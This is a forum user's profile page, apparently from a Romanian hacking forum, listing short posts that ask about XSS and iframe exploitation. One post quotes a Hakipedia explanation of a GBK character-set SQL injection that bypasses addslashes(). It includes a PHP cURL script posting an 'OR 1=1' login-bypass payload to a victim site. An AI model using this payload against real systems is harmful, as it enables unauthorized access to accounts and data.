Jump to content

ioinel

Members
  • Posts

    11
  • Joined

  • Last visited

Recent Profile Visitors

The recent visitors block is disabled and is not being shown to other users.

ioinel's Achievements

Newbie

Newbie (1/14)

10

Reputation

  1. ioinel

    Sympleboy22

    arata-mi unul. deci xss si iframe sunt doua vulnerabilitati diferite, nu? poti sa faci un tutorial despre cum sa exploatezi un iframe?
  2. ioinel

    Sympleboy22

    bine. si cu iframe-ul?
  3. ioinel

    Sympleboy22

    +1 pentru faza cu iframe. eu am alta intrebare.. de ce inainte sa`si faca unu blog pe baywords nu am vazut pe nimeni cu blog acolo? btw.. symple nu se scrie simple?
  4. Eu am gasit doar asta, dar n-am acum timp si nici un host pe care sa-l pun sa incerc. SQL Injection - Hakipedia In rare cases under certain conditions, filters such as addslashes() and magic_quotes_gpc can be bypassed when the vulnerable SQL server is using certain character sets such as the GBK character set. In GBK, the hex value of 0xbf27 is not a valid multi-byte character, however, the hex value of 0xbf5c is. If the characters are construed as single-byte characters, 0xbf5c is 0xbf (¿) followed by 0x5c (\); ¿\. And 0xbf27 is 0x27 (') following a 0xbf (¿); ¿'. This comes in handy when single quotes are escaped with a backslash (\) using addslashes() or when magic_quotes_gpc is turned on. Although it appears at first that the injection point is blocked via one of these methods, we can bypass this by using 0xbf27. By injecting this hex code, addslashes() will modify 0xbf27 to become 0xbf5c27, which is a valid multi-byte character (0xbf5c) and is followed by an non-escaped inverted comma. In other words, 0xbf5c is recognised as a single character, so the backslash is useless, and the quote is not escaped. Although the use of addslashes() or magic_quotes_gpc would normally be considered as somewhat secure, the use of GBK would render them near useless. The following PHP cURL script would be able to make use of the injection: <?php $url = "http://www.victimsite.com/login.php"; $ref = "http://www.victimsite.com/index.php"; $session = "PHPSESSID=abcdefg01234567890abcdefg"; $ch = curl_init(); curl_setopt( $ch, CURLOPT_URL, $url ); curl_setopt( $ch, CURLOPT_REFERER, $ref ); curl_setopt( $ch, CURLOPT_RETURNTRANSFER, TRUE ); curl_setopt( $ch, CURLOPT_COOKIE, $session ); curl_setopt( $ch, CURLOPT_POST, TRUE ); curl_setopt( $ch, CURLOPT_POSTFIELDS, "username=" . chr(0xbf) . chr(0x27) . "OR 1=1/*&submit=1" ); $data = curl_exec( $ch ); print( $data ); curl_close( $ch ); ?> The CURLOPT_POSTFIELDS line sets the characters to be passed as multi-byte characters, and finishes the statement with OR 1=1/*, thus creating an injection that will bypass the addslashes() and/or magic_quotes_gpc checking.
  5. nytro, stiu. am postat site-ul doar ca sa poata toti sa testeze acolo. are cineva un link cu tutorial la vulnerabilitatea aia?
  6. Challenge: Addslashes
  7. ioinel

    XSS Tunnel

    bun. un free host pe care sa pot sa-l pun stii? later:scuze, abia acum am vazut de 7host
  8. eu as vrea noul album al densiei. in ce e scris? tot vb6? =D
×
×
  • Create New...